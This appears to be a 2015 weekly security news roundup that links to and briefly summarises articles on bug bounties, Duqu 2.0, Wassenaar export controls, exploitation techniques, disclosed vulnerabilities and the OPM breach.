Week 24 In Review – 2015

Resources

• HackerOne Connects Hackers With Companies, and Hopes for a Win-Win – nytimes.com
  HackerOne is a San Francisco tech start-up that aims to become a mediator between companies with cybersecurity issues and hackers who are looking to solve problems rather than cause them. They hope their outfit can persuade other hackers to responsibly report security flaws, rather than exploit them, and connect those “white hats” with companies willing to pay a bounty for their finds.
• A DBIR Attack Graph Web App! – securityblog.verizonenterprise.com
  The DBIR Attack Graph Web App is meant to make analyzing DBIR attack graphs simple enough anyone can do it! To learn about the DBIR Attack Graph Web App, watch the tutorial video here.
• AppSecEU 2015 – youtube.com
  These are the videos from AppSec Europe 2015 in Amsterdam, Netherlands. You can watch and download the videos from here.
• ShowMeCon 2015 Videos – irongeek.com
  These are the videos ShowMeCon 2015. You can watch and download the videos from here.
• What exactly is Duqu 2.0? – community.rapid7.com
  Duqu, a very complex and modular malware platform thought to have gone dark in late 2012, has made its appearance within the environment of Kaspersky Labs. Dubbed “Duqu 2.0” by Kaspersky, the level of complexity found within the malware represents a high level of sophistication, skill, funding and motivation seen by nation-sponsored actors.
• Wassenaar Arrangement – Frequently Asked Questions – community.rapid7.com
  The purpose of this post is to help answer questions about the Wassenaar Arrangement. You can find the US proposal for implementing the Arrangement and an accompanying FAQ from the Bureau of Industry and Security (BIS) here.
  • Response to the US Proposal for Implementing the Wassenaar Arrangement Export Controls for Intrusion Software -community.rapid7.com
    On May 20th 2015, the Bureau of Industry and Security (BIS) published its proposal for implementing new export controls under the Wassenaar Arrangement.

Tools

• NOPC version 0.4.5 released – labs.portcullis.co.uk
  NOPC, the Nessus-based offline Unix patch checker has had some changes made and been made available in the tools section. This article discusses the new features in detail and provides some working examples.

Techniques

• Blind Return Oriented Programming – nccgroup.trust
  In this blog post you will have a look at some important steps of the Blind Return Oriented Programming (BROP), a state-of-the-art exploitation technique.

Vendor/Software patches

• Escaping VMware Workstation through COM1 – docs.google.com
  These bugs are subject to a 90 day disclosure deadline. If 90 days elapse without a broadly available patch, then the bug report will be made available to the public.
• PowerShell ♥ the Blue Team – blogs.msdn.com
  In this post, PowerShell Team will discuss some important advances they have made in scripting security and protection in the preview versions of PowerShell version 5, and Windows 10.
• Adobe, Microsoft Issue Critical Security Fixes – krebsonsecurity.com
  Adobe released software updates to plug at least 13 security holes in its Flash Player software. Separately, Microsoft pushed out fixes for at least three dozen flaws in Windows and associated software.

Vulnerabilities

• This code can hack nearly every credit card machine in the country – money.cnn.com
  An attacker can gain complete control of a store’s credit card readers, potentially allowing them to hack into the machines and steal customer’s payment data. This latest discovery comes from researchers at Trustwave, a cybersecurity firm.
• Kaspersky Lab cybersecurity firm is hacked – bbc.com
  One of the leading anti-virus software providers has revealed that its own systems were recently compromised by hackers. Kaspersky Lab said it believed the attack was designed to spy on its newest technologies.
• Security Advisory: Object Injection Vulnerability in WooCommerce – blog.sucuri.net
  During a routine audit for Sucuriblog’s WAF, they discovered a dangerous Object Injection vulnerability which could, in certain contexts, be used by an attacker to download any file on the vulnerable server.
• Serious iOS bug makes it easy to steal users’ iCloud passwords – arstechnica.com
  A security researcher has published attack code he said makes it easy to steal the iCloud passwords of people using the latest version of Apple iOS for iPhones and iPads. Researcher publishes proof-of-concept code demonstrating how attack works.

Other News

• Union: Hackers have personnel data on every federal employee – bigstory.ap.org
  Hackers stole personnel data and Social Security numbers for every federal employee, a government worker union said Thursday, asserting that the cyber theft of U.S. employee information was more damaging than the Obama administration has acknowledged.
  • Why this security breach is worse than all the others combined -caseysoftware.com
    The second OPM database that was breached contains sensitive background check information — called SF-86 data — that includes applicants’ financial histories and investment records, children’s and relatives’ names.
  • Chinese hack of federal personnel files included security-clearance database – washingtonpost.com
    The massive data breach into the records of current and former federal employees is believed to be worse than first thought.
• CIA releases secret report identifying errors before 9/11 – thehill.com
  After a decade of secrecy, the CIA on Friday released a nearly 500-page inspector general report outlining multiple “systemic problems” in the nation’s spy agencies ahead of the terror attacks on Sept. 11, 2001.